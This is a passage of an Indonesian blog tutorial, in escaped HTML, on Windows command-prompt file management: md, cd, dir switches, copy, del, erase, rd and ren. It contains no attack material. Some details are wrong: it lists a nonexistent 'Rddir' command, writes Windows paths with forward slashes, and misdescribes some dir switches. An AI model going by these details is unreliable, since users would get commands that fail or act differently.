initial; display: inline; height: auto !important; margin-bottom: 10px; max-width: 98%; padding-bottom: 5px; padding-left: 5px; padding-right: 5px; padding-top: 5px;" title="8" width="195" /&gt;&lt;/a&gt;&amp;nbsp;&lt;a href="http://kidzoom.files.wordpress.com/2010/03/9.png" style="color: #2089cc; outline-color: initial; outline-style: none; outline-width: initial; text-decoration: underline;"&gt;&lt;img alt="9" border="0" height="100" src="http://kidzoom.files.wordpress.com/2010/03/9_thumb.png?w=192&amp;amp;h=100" style="background-attachment: initial; background-clip: initial; background-color: #f2f2f2; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 0px; border-color: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 0px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 0px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 0px; border-width: initial; display: inline; height: auto !important; margin-bottom: 10px; max-width: 98%; padding-bottom: 5px; padding-left: 5px; padding-right: 5px; padding-top: 5px;" title="9" width="192" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="line-height: 24px; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Jika digabungkan :&lt;/div&gt;&lt;div style="line-height: 24px; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;a href="http://kidzoom.files.wordpress.com/2010/03/10.png" style="color: #2089cc; outline-color: initial; outline-style: none; outline-width: initial; text-decoration: underline;"&gt;&lt;img alt="10" border="0" height="109" src="http://kidzoom.files.wordpress.com/2010/03/10_thumb.png?w=196&amp;amp;h=109" style="background-attachment: initial; background-clip: initial; background-color: #f2f2f2; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 0px; border-color: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 0px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 0px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 0px; border-width: initial; display: inline; height: auto !important; margin-bottom: 10px; max-width: 98%; padding-bottom: 5px; padding-left: 5px; padding-right: 5px; padding-top: 5px;" title="10" width="196" /&gt;&lt;/a&gt;&amp;nbsp;&lt;a href="http://kidzoom.files.wordpress.com/2010/03/11.png" style="color: #2089cc; outline-color: initial; outline-style: none; outline-width: initial; text-decoration: underline;"&gt;&lt;img alt="11" border="0" height="107" src="http://kidzoom.files.wordpress.com/2010/03/11_thumb.png?w=190&amp;amp;h=107" style="background-attachment: initial; background-clip: initial; background-color: #f2f2f2; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 0px; border-color: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 0px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 0px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 0px; border-width: initial; display: inline; height: auto !important; margin-bottom: 10px; max-width: 98%; padding-bottom: 5px; padding-left: 5px; padding-right: 5px; padding-top: 5px;" title="11" width="190" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="line-height: 24px; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="line-height: 24px; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;PERINTAH-PERINTAH UNTUK MANAGEMENT FILE&lt;/div&gt;&lt;div style="line-height: 24px; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Dibawah ini merupakan perintah-perintah untuk management file, seperti&lt;br /&gt;
untuk membuat folder, mengcopy folder atau file, mengganti nama dan sebagainya.&lt;/div&gt;&lt;ul style="line-height: 0px; list-style-type: none; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;li style="background-attachment: initial; background-clip: initial; background-color: initial; background-image: url(http://s0.wp.com/wp-content/themes/pub/monochrome/img/bullet1.gif); background-origin: initial; background-position: 3px 7px; background-repeat: no-repeat no-repeat; line-height: 19px; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 18px; padding-right: 0px; padding-top: 0px; zoom: 1;"&gt;Md&lt;/li&gt;
&lt;/ul&gt;&lt;div style="line-height: 24px; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Berfungsi untuk membuat direktori&lt;br /&gt;
Contoh&lt;br /&gt;
Md \komputer&lt;br /&gt;
Akan membuat folder bernama computer didalam root folder.&lt;br /&gt;
Md \komputer\blog&lt;br /&gt;
Akan membuat folder bernama computer dan didalam folder computer akan dibuat folder bernama blog&lt;a href="http://kidzoom.files.wordpress.com/2010/03/12.png" style="color: #2089cc; outline-color: initial; outline-style: none; outline-width: initial; text-decoration: underline;"&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="line-height: 24px; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;img alt="12" border="0" height="34" src="http://kidzoom.files.wordpress.com/2010/03/12_thumb.png?w=244&amp;amp;h=34" style="background-attachment: initial; background-clip: initial; background-color: #f2f2f2; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 0px; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 0px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 0px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 0px; display: block; float: none; height: auto !important; margin-bottom: 10px; margin-left: auto; margin-right: auto; max-width: 98%; padding-bottom: 5px; padding-left: 5px; padding-right: 5px; padding-top: 5px;" title="12" width="244" /&gt;&lt;/div&gt;&lt;div style="line-height: 24px; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;/div&gt;&lt;ul style="line-height: 0px; list-style-type: none; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;li style="background-attachment: initial; background-clip: initial; background-color: initial; background-image: url(http://s0.wp.com/wp-content/themes/pub/monochrome/img/bullet1.gif); background-origin: initial; background-position: 3px 7px; background-repeat: no-repeat no-repeat; line-height: 19px; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 18px; padding-right: 0px; padding-top: 0px; zoom: 1;"&gt;Cd&lt;/li&gt;
&lt;/ul&gt;&lt;div style="line-height: 24px; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Berfungsi untuk berpindah dari satu direktori ke direktori lain.&lt;br /&gt;
Contoh f:/cd komputerblog&lt;a href="http://kidzoom.files.wordpress.com/2010/03/image38.png" style="color: #2089cc; outline-color: initial; outline-style: none; outline-width: initial; text-decoration: underline;"&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="line-height: 24px; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;img alt="image" border="0" height="58" src="http://kidzoom.files.wordpress.com/2010/03/image_thumb38.png?w=175&amp;amp;h=58" style="background-attachment: initial; background-clip: initial; background-color: #f2f2f2; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 0px; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 0px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 0px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 0px; display: block; float: none; height: auto !important; margin-bottom: 10px; margin-left: auto; margin-right: auto; max-width: 98%; padding-bottom: 5px; padding-left: 5px; padding-right: 5px; padding-top: 5px;" title="image" width="175" /&gt;&lt;/div&gt;&lt;div style="line-height: 24px; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;perintah diatas akan berpindah dari drive f ke folder komputerblog&lt;br /&gt;
Bagaimana kalau mau berpindah drive ? pada command prompt ketikkan drive yang&lt;br /&gt;
mau dituju.&lt;a href="http://kidzoom.files.wordpress.com/2010/03/image39.png" style="color: #2089cc; outline-color: initial; outline-style: none; outline-width: initial; text-decoration: underline;"&gt;&lt;img alt="image" border="0" height="55" src="http://kidzoom.files.wordpress.com/2010/03/image_thumb39.png?w=152&amp;amp;h=55" style="background-attachment: initial; background-clip: initial; background-color: #f2f2f2; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 0px; border-color: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 0px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 0px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 0px; border-width: initial; display: block; float: none; height: auto !important; margin-bottom: 10px; margin-left: auto; margin-right: auto; max-width: 98%; padding-bottom: 5px; padding-left: 5px; padding-right: 5px; padding-top: 5px;" title="image" width="152" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;ul style="line-height: 0px; list-style-type: none; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;li style="background-attachment: initial; background-clip: initial; background-color: initial; background-image: url(http://s0.wp.com/wp-content/themes/pub/monochrome/img/bullet1.gif); background-origin: initial; background-position: 3px 7px; background-repeat: no-repeat no-repeat; line-height: 19px; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 18px; padding-right: 0px; padding-top: 0px; zoom: 1;"&gt;dir [drive:][path][filename] [/A[[:]attributes]] [/B] [/C] [/D] [/L] [/O[[:]sortorder]]&lt;br /&gt;
[/P] [/Q] [/S] [/T[[:]timefield]] [/W] [/X] [/4]&lt;/li&gt;
&lt;/ul&gt;&lt;div style="line-height: 24px; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Berfungsi untuk menampilkan file dan subdirektori yang terdapat dalam direktori.&lt;br /&gt;
Perintah dir memiliki beberapa attribute, penjelasannya sebagai berikut :&lt;br /&gt;
/A : berfungsi untuk menampilkan file yang memiliki attribute direktori, file&lt;br /&gt;
tersembunyi, file system, read only file dan archiving file. Singkatnya dengan&lt;br /&gt;
menambahkan atribut ini maka semua file yang ada dalam direktori akan ditampilkan.&lt;/div&gt;&lt;div style="line-height: 24px; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;a href="http://kidzoom.files.wordpress.com/2010/03/13.png" style="color: #2089cc; outline-color: initial; outline-style: none; outline-width: initial; text-decoration: underline;"&gt;&lt;img alt="13" border="0" height="273" src="http://kidzoom.files.wordpress.com/2010/03/13_thumb.png?w=371&amp;amp;h=273" style="background-attachment: initial; background-clip: initial; background-color: #f2f2f2; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 0px; border-color: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 0px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 0px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 0px; border-width: initial; display: block; float: none; height: auto !important; margin-bottom: 10px; margin-left: auto; margin-right: auto; max-width: 98%; padding-bottom: 5px; padding-left: 5px; padding-right: 5px; padding-top: 5px;" title="13" width="371" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="line-height: 24px; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;/B : hanya menampilkan nama file saja.&lt;/div&gt;&lt;div style="line-height: 24px; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;a href="http://kidzoom.files.wordpress.com/2010/03/14.png" style="color: #2089cc; outline-color: initial; outline-style: none; outline-width: initial; text-decoration: underline;"&gt;&lt;img alt="14" border="0" height="222" src="http://kidzoom.files.wordpress.com/2010/03/14_thumb.png?w=215&amp;amp;h=222" style="background-attachment: initial; background-clip: initial; background-color: #f2f2f2; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 0px; border-color: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 0px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 0px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 0px; border-width: initial; display: block; float: none; height: auto !important; margin-bottom: 10px; margin-left: auto; margin-right: auto; max-width: 98%; padding-bottom: 5px; padding-left: 5px; padding-right: 5px; padding-top: 5px;" title="14" width="215" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="line-height: 24px; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;/D : menampilkan file secara horizontal&amp;nbsp;&lt;/div&gt;&lt;div style="line-height: 24px; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;a href="http://kidzoom.files.wordpress.com/2010/03/15.png" style="color: #2089cc; outline-color: initial; outline-style: none; outline-width: initial; text-decoration: underline;"&gt;&lt;img alt="15" border="0" height="148" src="http://kidzoom.files.wordpress.com/2010/03/15_thumb.png?w=337&amp;amp;h=148" style="background-attachment: initial; background-clip: initial; background-color: #f2f2f2; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 0px; border-color: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 0px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 0px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 0px; border-width: initial; display: block; float: none; height: auto !important; margin-bottom: 10px; margin-left: auto; margin-right: auto; max-width: 98%; padding-bottom: 5px; padding-left: 5px; padding-right: 5px; padding-top: 5px;" title="15" width="337" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="line-height: 24px; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;/L : menampilkan nama file secara lowercase&lt;/div&gt;&lt;div style="line-height: 24px; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;a href="http://kidzoom.files.wordpress.com/2010/03/16.png" style="color: #2089cc; outline-color: initial; outline-style: none; outline-width: initial; text-decoration: underline;"&gt;&lt;img alt="16" border="0" height="183" src="http://kidzoom.files.wordpress.com/2010/03/16_thumb.png?w=268&amp;amp;h=183" style="background-attachment: initial; background-clip: initial; background-color: #f2f2f2; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 0px; border-color: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 0px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 0px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 0px; border-width: initial; display: block; float: none; height: auto !important; margin-bottom: 10px; margin-left: auto; margin-right: auto; max-width: 98%; padding-bottom: 5px; padding-left: 5px; padding-right: 5px; padding-top: 5px;" title="16" width="268" /&gt;&lt;/a&gt;&lt;br /&gt;
/N : menampilkan file dengan nama format panjang, tanpa /N nama folder&lt;br /&gt;
“Program files” menjadi “progra~1”.&lt;a href="http://kidzoom.files.wordpress.com/2010/03/17.png" style="color: #2089cc; outline-color: initial; outline-style: none; outline-width: initial; text-decoration: underline;"&gt;&lt;img alt="17" border="0" height="223" src="http://kidzoom.files.wordpress.com/2010/03/17_thumb.png?w=278&amp;amp;h=223" style="background-attachment: initial; background-clip: initial; background-color: #f2f2f2; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 0px; border-color: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 0px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 0px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 0px; border-width: initial; display: block; float: none; height: auto !important; margin-bottom: 10px; margin-left: auto; margin-right: auto; max-width: 98%; padding-bottom: 5px; padding-left: 5px; padding-right: 5px; padding-top: 5px;" title="17" width="278" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="line-height: 24px; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;/O[attr] : menampilkan file sesuai urutan.&lt;br /&gt;
-N : Urut file sesuai nama (alphabetic)&lt;br /&gt;
-E : Urut file sesuai extension (alphabetic)&lt;br /&gt;
-G : Urut file sesuai group&lt;br /&gt;
-S : Urut file sesuai ukuran file (dimulai dari terkecil)&lt;br /&gt;
-D : Urut file sesuai waktu (dimulai dari yang paling lama)&lt;a href="http://kidzoom.files.wordpress.com/2010/03/19.png" style="color: #2089cc; outline-color: initial; outline-style: none; outline-width: initial; text-decoration: underline;"&gt;&lt;img alt="19" border="0" height="129" src="http://kidzoom.files.wordpress.com/2010/03/19_thumb.png?w=294&amp;amp;h=129" style="background-attachment: initial; background-clip: initial; background-color: #f2f2f2; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 0px; border-color: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 0px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 0px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 0px; border-width: initial; display: block; float: none; height: auto !important; margin-bottom: 10px; margin-left: auto; margin-right: auto; max-width: 98%; padding-bottom: 5px; padding-left: 5px; padding-right: 5px; padding-top: 5px;" title="19" width="294" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="line-height: 24px; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;/P : Mempause ketika layer command prompt sudah penuh.&lt;br /&gt;
/Q : Menampilkan nama pemilik dari file.&lt;a href="http://kidzoom.files.wordpress.com/2010/03/18.png" style="color: #2089cc; outline-color: initial; outline-style: none; outline-width: initial; text-decoration: underline;"&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="line-height: 24px; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;img alt="18" border="0" height="138" src="http://kidzoom.files.wordpress.com/2010/03/18_thumb.png?w=338&amp;amp;h=138" style="background-attachment: initial; background-clip: initial; background-color: #f2f2f2; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 0px; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 0px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 0px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 0px; display: block; float: none; height: auto !important; margin-bottom: 10px; margin-left: auto; margin-right: auto; max-width: 98%; padding-bottom: 5px; padding-left: 5px; padding-right: 5px; padding-top: 5px;" title="18" width="338" /&gt;&lt;/div&gt;&lt;div style="line-height: 24px; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;/div&gt;&lt;div style="line-height: 24px; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;/S : Menampilkan folder beserta subdirectori dan file yang terdapat didalamnya.&lt;br /&gt;
/W : Menampilkan file secara horizontal&lt;/div&gt;&lt;div style="line-height: 24px; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;ul style="line-height: 0px; list-style-type: none; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;li style="background-attachment: initial; background-clip: initial; background-color: initial; background-image: url(http://s0.wp.com/wp-content/themes/pub/monochrome/img/bullet1.gif); background-origin: initial; background-position: 3px 7px; background-repeat: no-repeat no-repeat; line-height: 19px; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 18px; padding-right: 0px; padding-top: 0px; zoom: 1;"&gt;Copy [/source] [destination]&lt;/li&gt;
&lt;/ul&gt;&lt;div style="line-height: 24px; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Berfungsi untuk menyalin file dari lokasi satu ke lokasi lain.&lt;br /&gt;
Contoh :&lt;br /&gt;
Copy c:/laporan.doc f:&lt;br /&gt;
Perintah ini akan menyalin file laporan.doc yang berada pada drive c ke drive f.&lt;br /&gt;
Copy c:/*.doc f:&lt;br /&gt;
Perintah ini akan menyalin semua file yang berextensi *.doc ke drive f.&lt;/div&gt;&lt;ul style="line-height: 0px; list-style-type: none; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;li style="background-attachment: initial; background-clip: initial; background-color: initial; background-image: url(http://s0.wp.com/wp-content/themes/pub/monochrome/img/bullet1.gif); background-origin: initial; background-position: 3px 7px; background-repeat: no-repeat no-repeat; line-height: 19px; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 18px; padding-right: 0px; padding-top: 0px; zoom: 1;"&gt;Del [file]&lt;/li&gt;
&lt;/ul&gt;&lt;div style="line-height: 24px; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Berfungsi untuk menghapus file.&lt;br /&gt;
Contoh :&lt;br /&gt;
Del c:/buku.txt&lt;br /&gt;
Perintah ini akan menghapus file buku.txt dalam drive c.&lt;br /&gt;
Del c:/*.txt&lt;br /&gt;
Perintah ini akan menghapus semua file yang berextensi *.txt dalam drive c.&lt;/div&gt;&lt;ul style="line-height: 0px; list-style-type: none; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;li style="background-attachment: initial; background-clip: initial; background-color: initial; background-image: url(http://s0.wp.com/wp-content/themes/pub/monochrome/img/bullet1.gif); background-origin: initial; background-position: 3px 7px; background-repeat: no-repeat no-repeat; line-height: 19px; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 18px; padding-right: 0px; padding-top: 0px; zoom: 1;"&gt;Erase [file]&lt;/li&gt;
&lt;/ul&gt;&lt;div style="line-height: 24px; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Sama seperti perintah del, berfungsi untuk menghapus file.&lt;br /&gt;
Contoh :&lt;br /&gt;
erase c:/buku.txt&lt;br /&gt;
Perintah ini akan menghapus file buku.txt dalam drive c.&lt;br /&gt;
erase c:/*.txt&lt;/div&gt;&lt;div style="line-height: 24px; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Perintah ini akan menghapus semua file yang berextensi *.txt dalam drive c.&lt;/div&gt;&lt;ul style="line-height: 0px; list-style-type: none; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;li style="background-attachment: initial; background-clip: initial; background-color: initial; background-image: url(http://s0.wp.com/wp-content/themes/pub/monochrome/img/bullet1.gif); background-origin: initial; background-position: 3px 7px; background-repeat: no-repeat no-repeat; line-height: 19px; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 18px; padding-right: 0px; padding-top: 0px; zoom: 1;"&gt;Rd [folder]&lt;/li&gt;
&lt;/ul&gt;&lt;div style="line-height: 24px; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Perintah ini berfungsi untuk menghapus suatu direktori.&lt;br /&gt;
Contoh&lt;br /&gt;
Rd games&lt;br /&gt;
Perintah ini akan menghapus folder yang bernama games.&lt;/div&gt;&lt;ul style="line-height: 0px; list-style-type: none; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;li style="background-attachment: initial; background-clip: initial; background-color: initial; background-image: url(http://s0.wp.com/wp-content/themes/pub/monochrome/img/bullet1.gif); background-origin: initial; background-position: 3px 7px; background-repeat: no-repeat no-repeat; line-height: 19px; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 18px; padding-right: 0px; padding-top: 0px; zoom: 1;"&gt;Rddir [folder]&lt;/li&gt;
&lt;/ul&gt;&lt;div style="line-height: 24px; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Sama seperti perintah rd, yaitu untuk menghapus direktori.&lt;br /&gt;
Contoh&lt;br /&gt;
Rddir game_lama&lt;br /&gt;
Perintah ini akan menghapus folder yang bernama game_lama&lt;/div&gt;&lt;div style="line-height: 24px; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;ul style="line-height: 0px; list-style-type: none; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;li style="background-attachment: initial; background-clip: initial; background-color: initial; background-image: url(http://s0.wp.com/wp-content/themes/pub/monochrome/img/bullet1.gif); background-origin: initial; background-position: 3px 7px; background-repeat: no-repeat no-repeat; line-height: 19px; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 18px; padding-right: 0px; padding-top: 0px; zoom: 1;"&gt;Ren [namafile] [namabaru]&lt;/li&gt;
&lt;/ul&gt;&lt;div style="line-height: 24px; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Berfungsi untuk mengganti nama suatu file.&lt;br /&gt;
Contoh :&lt;br /&gt;
Ren kinta.doc kuliah.doc&lt;br /&gt;
Perintah ini akan mengganti nama kinta.doc dengan kuliah.doc&lt;/div&gt;&lt;div style="line-height: 24px; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;br /&gt;
